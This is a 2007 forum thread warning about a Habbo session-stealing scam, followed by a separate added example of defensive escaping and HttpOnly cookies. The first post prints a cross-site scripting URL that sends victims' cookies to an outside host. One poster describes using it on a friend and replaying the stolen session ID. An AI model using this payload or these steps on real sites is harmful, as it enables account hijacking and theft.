
View Full Version : Recent Scam



Yux
29-05-2007, 09:26 PM
This is a recent scam, and I don't believe this has been posted, so I'm going to warn you all. There's a new scam based on Session Stealing.

If anybody asks you to go on a link similar to http://www.habbo.co.uk/credits/buy_credits/phone.html?habbo_id_1_length=%22%20/%3E%3Cscript%20language=%22JavaScript%22%3Edocumen t.location=%22http://h1.ripway.com/EXAMPLE/ getsesh.php?cookie=%22%20%2B%20document.cookie;%3C/script %3E%3Cz%20%22 DO NOT go on it, if you do you will be keylogged within a matter of minutes whether you change your password or not.


- Yux

Pyroka
29-05-2007, 09:39 PM
Yeah I see, they're using 'ripway.com' it seems to embed the keylogger via cookies. Oh the sods, and thanks for the update. :)

_Liam
29-05-2007, 09:42 PM
i go and click it don't i lol shall i delete my cookies ?

Yux
29-05-2007, 09:43 PM
i go and click it don't i lol shall i delete my cookies ?

No don't worry, I edited the link so it's harmless


- Yux

MrCorny
30-05-2007, 07:20 AM
Thanks for that. nasty people :(

Ed.
30-05-2007, 07:29 AM
Thanks Yux!

You always keep us up-to-date with scams to be careful of!


Legend!!!

Diesel
30-05-2007, 08:51 AM
When you click a harmful link, they manage to steal your internet cookies.
This has your habbo Session from habbo home stolen, and they can use it.

Most of the time the session times out before they can do anything, but be careful!!

dannyisnotamazing
30-05-2007, 09:00 AM
It's not a keylogger :S. They can only log into your account once then if you log out and log back in they can't get back on.. unless you click the link again.

It's fairly simple to avoid the scam you haven't been keylogged and if you do ever click the link then just log out of Habbo and log back in or if you weren't even on Habbo then you've nothing to worry about. So changing your password is useless because they can't get back on your account unless you click the link again..

le harry
30-05-2007, 11:02 AM
At above poster.

It's embedded in the cookies, he edited the link so it's harmless.

Hab4Life
30-05-2007, 11:15 AM
Lol it ain't a keylogger.. I tried it on a friend to show him it

U don't even get their pass, all that happens is when they click the link you get their sessionid, then u put their sessionid in the url bar and refresh habbo and u will be logged in as them

its rubbish tho cos it only works if the person logged in less than 10 mins ago

Nether$
30-05-2007, 11:53 AM
Authenticated sessions:

Cookie on the habbo server, Cookie on the client.

When it expires, the server cookie is destroyed.

If you do manage to gain access to the cookie, there will be no way of replicating the login key with the server and the client id (traced by IP usually) will not match any existing sessions, causing a corruption of the server cookie.

You would not be able to do this, *unless* Habbo is cheap and do not use serverside authentication, if this is the case it violates European legislation. However habbo breaks the law everywhere :S


Lol

Shawnstra
30-05-2007, 12:00 PM
Interesting how they can use the Habbo.co.uk domain. Thanks for the tip :)
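
The link in the first post stays on the habbo.co.uk domain because the script travels inside a query parameter of a real page. The sketch below is an added example, not part of the thread and not Habbo's code: it assumes the page echoes `habbo_id_1_length` into a quoted HTML attribute, and the function names, the `session` cookie name and the sample value are hypothetical.

```javascript
// Added example (not Habbo's code): why a script in a query parameter can run
// on the real domain, and two server-side defences. All names are hypothetical.

// Constructed, inert stand-in for the injected value: it closes the quoted
// attribute and the tag, then opens a <script> element.
const SAMPLE_VALUE = '" /><script>/* injected script would go here */</script><z "';

// Vulnerable pattern: the query value is pasted into the HTML unchanged.
function renderUnsafe(value) {
  return '<input name="habbo_id_1_length" value="' + value + '" />';
}

// Escape the five characters that can end an attribute or start a tag.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: same template, value encoded for an attribute context.
function renderSafe(value) {
  return '<input name="habbo_id_1_length" value="' + escapeHtml(value) + '" />';
}

// Second layer: HttpOnly keeps the session cookie out of document.cookie,
// so an injected script cannot read it. Secure restricts it to HTTPS.
function sessionCookieHeader(sessionId) {
  return 'Set-Cookie: session=' + encodeURIComponent(sessionId) +
         '; HttpOnly; Secure; Path=/';
}

// True if the rendered HTML contains a live <script> element.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log('unsafe render has script tag:', containsScriptTag(renderUnsafe(SAMPLE_VALUE)));
console.log('safe render has script tag:  ', containsScriptTag(renderSafe(SAMPLE_VALUE)));
console.log(sessionCookieHeader('constructed-session-id'));
```

Escaping stops the value from leaving the attribute, and the HttpOnly flag limits what a script could take if another injection point were missed.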
